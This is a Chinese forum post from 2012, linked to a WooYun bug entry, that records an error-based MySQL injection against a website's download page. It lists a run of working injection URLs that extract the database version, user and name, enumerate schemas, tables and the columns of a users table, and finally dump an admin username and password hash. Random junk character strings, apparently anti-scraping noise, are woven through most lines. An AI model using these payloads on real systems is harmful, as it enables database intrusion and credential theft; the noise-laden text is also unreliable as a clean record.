http://www.wooyun.org/bugs/wooyun-2010-01666
: z3 Q% i6 m) D4 a/ F& n9 [7 i( ^" d% n: i3 ^; z5 X! t
之前想找个测试 没想到这有 可以测试下做个记录而已
/ ~( ~( p/ Q( ?& p# I4 [ c* v% Y$ @6 D% o
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
* m+ y+ j) [6 n- M9 x s
4 V' b: A+ F' H: q/data0/htdocs/leqi_new/app/myapp.php
; ~% v! h7 |! ?& n8 \0 Z
( E! M: b, A3 q- {& Z3 m# q* z 或者
Z; u, n) d% L+ o/ R
, i$ n+ h7 N! L6 k& ^/**********version()**********/ 5.1.49-log
0 m: S. |6 B% Z+ R+ e: I% Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- Z0 g4 w7 _5 V a) W
; P& G( W0 u8 u) d# y* v* d/**********user()**********/ A0 u) r! Y: \+ k0 D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) @0 X0 U9 c- V0 u, C i
* P" ~% f: r' N+ b: k0 k/**********database()**********/ leqi, f( j4 b" s/ @/ Q3 w9 n, {: l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 v: F* j; @7 G: S7 A! O
9 J6 H! c2 Z$ N/**********limit依次递归爆库**********/
6 s: m) \% t+ {) i; {$ p" K! nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, _ K7 n/ }0 S" ?information_schema
* p/ s8 h# x p4 j% s7 d. a9 zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 `; `8 M5 {# @& Z0 f3 r. Jleqi' E7 }/ w& j7 M: s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 ?; P1 t0 v) ]; w( ]1 d; d$ n# stest9 d( o0 }/ G2 y: i5 W2 t
6 n( a4 Y2 v) S! _/**********limit依次递归爆表名**********/& v) z Z. a6 B" H
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 y( t( i3 G- a7 z0 e6 I) x
users
5 m( @6 O; \* ]7 l z$ z& v! V: e4 y
/**********limit依次递归爆字段名**********/
- T- d5 O- W3 p, B7 [% b9 c' c1 Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% v0 |( n: e) \$ Q9 c& @' [
user_id,username,nickname,passwd,group_id
' u1 Y/ }: M, C' M0 v1 R; B9 ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' P# Z3 ]" y9 h1 r/ f! S( `/wapc/5000_0005_0032 L4 _, T# S6 Q. @ f/ f
11 216 B( O% l" L$ i/ B0 r8 D6 v, X' `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%230 L9 _ P' q; I7 [2 Q: ^
/wapc/5000_0005_003
; q" s+ z5 R) O, r' s) _11 341 351 361# ?$ U# j9 H! r* x1 t
/**********爆数据**********/
# q' M. H a; ]0 P9 phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%232 x4 \, ]& S P2 \
admin" \7 I$ |' O+ s! o" J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" m8 ? l' [+ t4 T' w- D
6a8b4574ca231eb8bd52764d4978ffcd" u& i6 `3 |( ?8 H1 O
! C2 A6 r5 E E; x9 y S( x% ?
" y4 z; x. _3 t1 i' ?
|
发表于 2012-9-13 17:52:09
收藏
支持
反对